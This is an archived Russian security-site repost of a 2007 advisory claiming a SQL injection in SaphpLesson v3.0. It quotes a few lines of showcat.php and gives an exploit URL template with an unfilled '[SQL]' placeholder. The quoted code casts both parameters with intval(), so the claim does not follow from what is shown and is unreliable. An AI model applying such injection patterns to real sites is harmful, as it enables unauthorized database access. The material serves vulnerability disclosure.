Информационная безопасность

Уведомление о безопасности: SaphpLesson v3.0 SQL Injection Exploit
back  новости / статьи / форум / программы / реклама / поиск / эксплоиты  forward
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [ECHO_ADV_66$2007] SendStudio <= 2004.14 Remote File Inclusion Vulnerability

  pheap [edit LFI] vulnerability

  LoveCMS 1.4 multiple vulnerabilities

  Plantilla PHP Simple

From:gamr-14_(at)_hotmail.com <gamr-14_(at)_hotmail.com>
Date:22 февраля 2007 г.
Subject:SaphpLesson v3.0 SQL Injection Exploit


//////////////////2007/////////////////////
//SaphpLesson v3.0 SQL Injection Exploit//
//////////////////////////////////////////
################################
Found by:SwEET-DeViL&HaCKeR sUn#
TeaM AL-GaRNi------------------#
Application : SaphpLesson------#
version : v3.0-----------------#
URL : No-----------------------#
################################
-------------------------------------------------------------------------------
Line 19'/'23 of showcat.php                                                  ||
---------------<?                                                            ||
$forumid = intval($_GET["forumid"]);                                         ||
                                                                            ||
$Page    = intval($_GET["Page"]);                                            ||
                                                                            ||
$tit     = mysql_query("select Title,CatID from forums where id=$forumid");  ||
?>----------------------------------------------------------------------------
-

ExploiTs :-
""""""""""
http://www.Site.com/Path/showcat.php?forumid=1&Page=-1[SQL]);#

/*''''''''''''''''
'''''''''''''''''
'''''''''''''''''
'''''''''''/*
END
___________K-S-A______________
|ЬЬЬЬЬЬTeam AL-GaRNiЬЬЬЬЬЬЬЬЬЬЬ|
:::::::::::::::::::::::::::::::::
::-###########-----###########-::
::-###########-----###########-::
::-###-------------###-----###-::
::-###-------------###########-::
::-###---######----###########-::
::-###---##-###----###--###----::
::-###------###----###---###---::
::-############----###----###--::
::-############----###----###--::
:::::::::::::::::::::::::::::::::
|ЬЬЬЬЬgamr-14@hotmail.comЬЬЬЬЬЬЬ|
|ЬЬЬЬЬЬЬЬЬm-o-t@msn.comЬЬЬЬЬЬЬЬЬ|
О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 


Rating@Mail.ru
test server